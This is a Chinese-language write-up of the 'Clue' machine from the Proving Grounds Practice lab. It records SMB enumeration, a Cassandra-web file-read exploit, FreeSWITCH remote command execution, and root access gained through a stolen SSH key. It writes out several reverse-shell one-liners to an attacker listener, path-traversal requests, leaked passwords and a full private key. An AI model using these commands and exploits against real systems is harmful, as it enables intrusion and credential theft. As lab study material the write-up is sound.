scan

autorecon

- os
Debian Linux
OS: Linux/Unix (Samba 4.9.5-Debian)
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: Windows 6.1
Native LAN manager: Samba 4.9.5-Debian
Platform id: '500'
Server type: '0x809a03'

- ports

- 22 
  openssh 7.9p1

- 80
  apache 2.4.38
  首页403 
  扫到/backup文件夹

- 139

- 445
  SMB 3.0

    freeswitch
    cassandra

      csmb: \freeswitch\usr\> cd bin
    smb: \freeswitch\usr\bin\> ls
      .                                   D        0  Mon Oct 25 01:26:29 2021
      ..                                  D        0  Mon Oct 25 01:26:29 2021
      tone2wav                            N    14512  Mon Oct 25 01:26:29 2021
      fs_ivrd                             N    68320  Mon Oct 25 01:26:29 2021
      fs_cli                              N    98624  Mon Oct 25 01:26:29 2021
      ...

- 3000 
  vary:oprigin
  Cassandra web

  存在backup/cert

foothold

smb匿名登录

发现freeswitch和cassandra文件夹

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  5 16:43:50 2022
  ..                                  D        0  Fri Aug  5 16:43:44 2022
  freeswitch                          D        0  Fri Aug  5 16:43:51 2022
  cassandra                           D        0  Fri May  6 23:04:47 2022

                14343176 blocks of size 1024. 10599324 blocks available
smb: \> cd freeswitch\
smb: \freeswitch\> ls
  .                                   D        0  Fri Aug  5 16:43:51 2022
  ..                                  D        0  Fri Aug  5 16:43:50 2022
  usr                                 D        0  Mon Oct 25 01:26:29 2021
  var                                 D        0  Mon Oct 25 01:26:29 2021
  etc                                 D        0  Fri Aug  5 16:43:51 2022

                14343176 blocks of size 1024. 10599324 blocks available
smb: \freeswitch\> cat /etc/
cat: command not found
smb: \freeswitch\> ls
  .                                   D        0  Fri Aug  5 16:43:51 2022
  ..                                  D        0  Fri Aug  5 16:43:50 2022
  usr                                 D        0  Mon Oct 25 01:26:29 2021
  var                                 D        0  Mon Oct 25 01:26:29 2021
  etc                                 D        0  Fri Aug  5 16:43:51 2022

                14343176 blocks of size 1024. 10599324 blocks available
smb: \freeswitch\> cd etc\
smb: \freeswitch\etc\> ls
  .                                   D        0  Fri Aug  5 16:43:51 2022
  ..                                  D        0  Fri Aug  5 16:43:51 2022
  freeswitch                          D        0  Mon Oct 25 01:23:57 2021

                14343176 blocks of size 1024. 10599324 blocks available
smb: \freeswitch\etc\> cd freeswitch\
smb: \freeswitch\etc\freeswitch\> ls
  .                                   D        0  Mon Oct 25 01:23:57 2021
  ..                                  D        0  Fri Aug  5 16:43:51 2022
  vars.xml                            N    19463  Mon Oct 25 01:23:57 2021
  tetris.ttml                         N     1157  Mon Oct 25 01:23:57 2021
  ...
  
 smb: \> cd cassandra\
smb: \cassandra\> ls
  .                                   D        0  Fri May  6 23:04:47 2022
  ..                                  D        0  Fri Aug  5 16:43:50 2022
  usr                                 D        0  Fri May  6 23:04:47 2022
  var                                 D        0  Fri May  6 23:04:47 2022
  etc                                 D        0  Fri May  6 23:04:47 2022

                14343176 blocks of size 1024. 10599320 blocks available
smb: \cassandra\>

freeswitch

经过搜索 freeswitch存在RCE漏洞

执行payload提示 auth invalid

从github有下载了exploit payload一样提示auth faild

http://github.com:Chocapikk/CVE-2019-19492.git

python exploit.py --target 192.168.166.240

b'Content-Type: command/reply\nReply-Text: -ERR invalid\n\nContent-Type: text/disconnect-notice\nContent-Length: 67\n\nDisconnected, goodbye.\nSee you at ClueCon! http://www.cluecon.com/\n'
Authentication failed - 192.168.166.240:8021
Not vulnerable

利用代码中password是默认密码ClueCon

1
2
3

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

cassandra

cassandra 存在任意文件读取漏洞

读取/etc/passwd发现三个用户 root/cassie/anthony

python 49362.py 192.168.166.240 /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ntp:x:106:113::/nonexistent:/usr/sbin/nologin
cassandra:x:107:114:Cassandra database,,,:/var/lib/cassandra:/usr/sbin/nologin
cassie:x:1000:1000::/home/cassie:/bin/bash
freeswitch:x:998:998:FreeSWITCH:/var/lib/freeswitch:/bin/false
anthony:x:1001:1001::/home/anthony:/bin/bash

第一想法是是否可以读取某个用户的私钥信息，但是发现都读不到，唯一可以读取到的就是cassie/.ssh/known_hosts

python 49362.py 192.168.166.240 /home/cassie/.ssh/id_rsa
Failed to read /home/cassie/.ssh/id_rsa (bad path?)

python 49362.py 192.168.166.240 /home/anthony/.ssh/id_rsa
Failed to read /home/anthony/.ssh/id_rsa (bad path?)

python 49362.py 192.168.166.240 /root/.ssh/id_rsa
Failed to read /root/.ssh/id_rsa (bad path?)


python 49362.py 192.168.166.240 /home/cassie/.ssh/known_hosts
|1|cl0mW7klh2+eUO1GAszDa6SDpRI=|jSUa2FlglH9H3qUYQbfvLix8ino= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCpAb2jUKovAahxmPX9l95Pq9YWgXfIgDJw0obIpOjOkdP3b0ukm/mrTNgX2lg1mQBMlS3lzmQmxeyHGg9+xuJA=

然后想到可以试下读取freeswitch的密码，搜索默认密码的存储位置是/usr/local/freeswitch/conf/autoload_configs/xml_rpc.conf.xml，但是仍没有读到信息

1 2	python 49362.py 192.168.166.240 /usr/local/freeswitch/conf/autoload_configs/xml_rpc.conf.xml Failed to read /usr/local/freeswitch/conf/autoload_configs/xml_rpc.conf.xml (bad path?)

然后又尝试读crontab等其他文件，没有什么可以利用的方式。看一下当前进程，但是当时账号和密码被我忽略了，没有细看，只扫到执行了cassandra-web命令

1
2
3

python 49362.py 192.168.166.240 /proc/self/cmdline

/usr/bin/ruby2.5/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330

单纯文件读取无法执行命令，读不到敏感信息，没法拿下机器，还是需要寄希望于freeswtich 命令执行漏洞。

再检查了一遍backup文件夹，看是不是能找到有用的信息，是不是可能有密码，使用smbclient一个个检查效率太低, 直接把远程smb挂载到本地

1	sudo mount.cifs //192.168.166.240/backup ./backup -o guest

在vscode中打开，搜索pass, 找到密码确实是ClueCon, 然后我测试了所有搜索pass找到的疑似的密码，全部都invalid。

File Read & Cmd Execute

后来突然想到，在任意文件读取的时候不知道有哪些文件，所以没法找到有效信息，backup里就有文件的路径。

python 49362.py 192.168.166.240 /etc/freeswitch/autoload_configs/event_socket.conf.xml

<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="StrongClueConEight021"/>
  </settings>
</configuration>

果然读到了服务器上的密码

python exploit.py --target 192.168.166.240

StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Command executed successfully - 192.168.166.240
VULNERABLE USER: freeswitch
# id
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 63

uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)

# whoami
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 11

freeswitch

本地nc -nvlp 443，反弹shell, 试了nc, busybox nc , python, bash -i /tcp/port 都不成功，并且确认网络是能ping通的

# which nc
/usr/bin/nc

# nc 192.168.45.229 443 -e /bin/bash
Error: timed out
#
# /usr/bin/nc 192.168.45.184 443 -e /bin/bash
Error: timed out

# sh -i >& /dev/tcp/192.168.45.184/443 0>&1
-ERR no reply

# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.184 443 >/tmp/f
Error: timed out
# busybox nc 192.168.45.184 443 -e sh
Error: timed out
# which python
/usr/bin/python

# python -c 'import pty; pty.spwan("bin/bash")'
-ERR no reply

# ping 192.168.166.240 -c 1
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 275

PING 192.168.166.240 (192.168.166.240) 56(84) bytes of data.
64 bytes from 192.168.166.240: icmp_seq=1 ttl=64 time=0.017 ms

--- 192.168.166.240 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms

到/home下看下两个目录下都有什么文件

# ls -al /home/cassie
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 495

total 32
drwxr-xr-x 4 cassie cassie 4096 Aug 11  2022 .
drwxr-xr-x 4 root   root   4096 Aug  5  2022 ..
lrwxrwxrwx 1 root   root      9 Aug  5  2022 .bash_history -> /dev/null
-rw-r--r-- 1 cassie cassie  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 cassie cassie 3526 Apr 18  2019 .bashrc
drwx------ 3 cassie cassie 4096 Aug 11  2022 .gnupg
-rw------- 1 cassie cassie 1823 Aug 11  2022 id_rsa
-rw-r--r-- 1 cassie cassie  807 Apr 18  2019 .profile
drwx------ 2 cassie cassie 4096 Aug 11  2022 .ssh

# cat /home/cassie/id_rsa
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 14

-ERR no reply

# ls -al /home/anthoy
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 14

-ERR no reply

# cat /home/anthony/.bash_history
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 14

-ERR no reply

# ls -al /home/anthony
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 392

total 28
drwxr-xr-x 3 anthony anthony 4096 Aug  5  2022 .
drwxr-xr-x 4 root    root    4096 Aug  5  2022 ..
-rw------- 1 anthony anthony  120 Aug  5  2022 .bash_history
-rw-r--r-- 1 anthony anthony  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 anthony anthony 3526 Apr 18  2019 .bashrc
-rw-r--r-- 1 anthony anthony  807 Apr 18  2019 .profile
drwx------ 2 anthony anthony 4096 Aug  5  2022 .ssh

# cat /home/anthony/.bash_history
StrongClueConEight021
b'Content-Type: auth/request\n\n'
Authenticated - 192.168.166.240:8021
Content-Type: api/response
Content-Length: 14

-ERR no reply

/home/cassie下有个私钥文件，直接读取没有任何返回，应该freeswitch没有权限

使用cassandra 任意文件读取漏洞读取到私钥文件，修改私钥权限600, ssh cassandra@192.168.166.240 -i id_rsa提示错误error in libcrypto

python 49362.py 192.168.166.240 /home/cassie/id_rsa > cassie_id_rsa

cat cassie_id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAw59iC+ySJ9F/xWp8QVkvBva2nCFikZ0VT7hkhtAxujRRqKjhLKJe
d19FBjwkeSg+PevKIzrBVr0JQuEPJ1C9NCxRsp91xECMK3hGh/DBdfh1FrQACtS4oOdzdM
jWyB00P1JPdEM4ojwzPu0CcduuV0kVJDndtsDqAcLJr+Ls8zYo376zCyJuCCBonPVitr2m
B6KWILv/ajKwbgrNMZpQb8prHL3lRIVabjaSv0bITx1KMeyaya+K+Dz84Vu8uHNFJO0rhq
gBAGtUgBJNJWa9EZtwws9PtsLIOzyZYrQTOTq4+q/FFpAKfbsNdqUe445FkvPmryyx7If/
DaMoSYSPhwAAA8gc9JxpHPScaQAAAAdzc2gtcnNhAAABAQDDn2IL7JIn0X/FanxBWS8G9r
acIWKRnRVPuGSG0DG6NFGoqOEsol53X0UGPCR5KD4968ojOsFWvQlC4Q8nUL00LFGyn3XE
QIwreEaH8MF1+HUWtAAK1Lig53N0yNbIHTQ/Uk90QziiPDM+7QJx265XSRUkOd22wOoBws
mv4uzzNijfvrMLIm4IIGic9WK2vaYHopYgu/9qMrBuCs0xmlBvymscveVEhVpuNpK/RshP
HUox7JrJr4r4PPzhW7y4c0Uk7SuGqAEAa1SAEk0lZr0Rm3DCz0+2wsg7PJlitBM5Orj6r8
UWkAp9uw12pR7jjkWS8+avLLHsh/8NoyhJhI+HAAAAAwEAAQAAAQBjswJsY1il9I7zFW9Y
etSN7wVok1dCMVXgOHD7iHYfmXSYyeFhNyuAGUz7fYF1Qj5enqJ5zAMnataigEOR3QNg6M
mGiOCjceY+bWE8/UYMEuHR/VEcNAgY8X0VYxqcCM5NC201KuFdReM0SeT6FGVJVRTyTo+i
CbX5ycWy36u109ncxnDrxJvvb7xROxQ/dCrusF2uVuejUtI4uX1eeqZy3Rb3GPVI4Ttq0+
0hu6jNH4YCYU3SGdwTDz/UJIh9/10OJYsuKcDPBlYwT7mw2QmES3IACPpW8KZAigSLM4fG
Y2Ej3uwX8g6pku6P6ecgwmE2jYPP4c/TMU7TLuSAT9TpAAAAgG46HP7WIX+Hjdjuxa2/2C
gX/VSpkzFcdARj51oG4bgXW33pkoXWHvt/iIz8ahHqZB4dniCjHVzjm2hiXwbUvvnKMrCG
krIAfZcUP7Ng/pb1wmqz14lNwuhj9WUhoVJFgYk14knZhC2v2dPdZ8BZ3dqBnfQl0IfR9b
yyQzy+CLBRAAAAgQD7g2V+1vlb8MEyIhQJsSxPGA8Ge05HJDKmaiwC2o+L3Er1dlktm/Ys
kBW5hWiVwWoeCUAmUcNgFHMFs5nIZnWBwUhgukrdGu3xXpipp9uyeYuuE0/jGob5SFHXvU
DEaXqE8Q9K14vb9by1RZaxWEMK6byndDNswtz9AeEwnCG0OwAAAIEAxxy/IMPfT3PUoknN
Q2N8D2WlFEYh0avw/VlqUiGTJE8K6lbzu6M0nxv+OI0i1BVR1zrd28BYphDOsAy6kZNBTU
iw4liAQFFhimnpld+7/8EBW1Oti8ZH5Mx8RdsxYtzBlC2uDyblKrG030Nk0EHNpcG6kRVj
4oGMJpv1aeQnWSUAAAAMYW50aG9ueUBjbHVlAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----


ssh cassie@192.168.166.240 -i cassie_id_rsa
Load key "cassie_id_rsa": error in libcrypto
cassie@192.168.166.240's password:

搜索一番后，是因为直接下载的私钥文件存在换行符不正确的问题（\r\n），在vscode中打开点击右下角的LF，更改成CRLF，重新登录，发现还是提示输入密码，然后又尝试了使用anthony账号也不正确

ssh cassie@192.168.166.240 -i ~/id_rsa
cassie@192.168.166.240's password:
Permission denied, please try again.
cassie@192.168.166.240's password:

ssh anthony@192.168.166.240 -i ~/id_rsa
anthony@192.168.166.240's password:

难道是root的私钥文件，竟然登录成功了

ssh root@192.168.166.240 -i ~/id_rsa

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
id
uid=0(root) gid=0(root) groups=0(root)

官方walk through

msf 获取到shell
在获取到freeswitch shell后，使用cassie：SecondBiteTheApple330切换到cassie账号（sshd_config限制了只有root和anthony能ssh登录），发现cassie可以不使用密码执行sudo cassandra-web，使用root账号可以读取系统上所有文件

freeswitch@clue:/$ su - cassie
Password: SecondBiteTheApple330
cassie@clue:~$ sudo -l
Matching Defaults entries for cassie on clue:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cassie may run the following commands on clue:
    (ALL) NOPASSWD: /usr/local/bin/cassandra-web

通过444端口查看/home/anthony/.bash_history 文件， anthony生成了密钥对，然后把公钥复制到root/.ssh/authorized_keys文件

cassie@clue:~$ curl localhost:444/../../../../../../../../home/anthony/.bash_history --path-as-is
clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exit

下载私钥文件，ssh root@127.0.0.1 -i id_rsa, 根据这一步怀疑是官方忘记清理/home/cassie/id_rsa了，我才能直接读取后登录root.

cassie@clue:~$ curl localhost:444/../../../../../../../../home/anthony/.ssh/id_rsa --path-as-is -o id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1823  100  1823    0     0   178k      0 --:--:-- --:--:-- --:--:--  197k
cassie@clue:~$ chmod 600 id_rsa
cassie@clue:~$ ls -l id_rsa
-rw------- 1 cassie cassie 1823 Aug  2 16:40 id_rsa
cassie@clue:~$ ssh -i id_rsa -l root 127.0.0.1
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
...
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
...
root@clue:~# id
uid=0(root) gid=0(root) groups=0(root)

反思

如果/home/cassie目录下没有id_rsa文件，我还能成功吗？难

我为什么没有得到freeswitch的交互式shell
1. 这次深刻体会到了前人经验中所说的：机器上开放了哪些端口，nc 反弹shell就是用哪些端口，测试8021和80能成功，其他端口都可以
2. 使用443端口时会返回timeout，而这个timeout实际是因为expolit.py中设置了5s的超时，而不是服务器主动断开的，当时让我有即使我反弹成功了，5s后也会断开的错觉，没有继续尝试
exploit代码一定得好好读，弄清楚原理
忽略了cassie的密码这样的重要信息，一定得细致，收集信息是关键
在使用freeswitch读取anthoy/.bash_history没有权限之后，即使在使用cassia sudo 能读取全部文件之后，我大概率会忽略这个文件，因为心理暗示自己已经查看过来，是自己的大忌，总想着先排除一些信息，把问题缩小，以后一定得注意在获取新的账号权限后，把之前的信息收集再做一次

临渊羡鱼

Proving Grounds Practice - Clue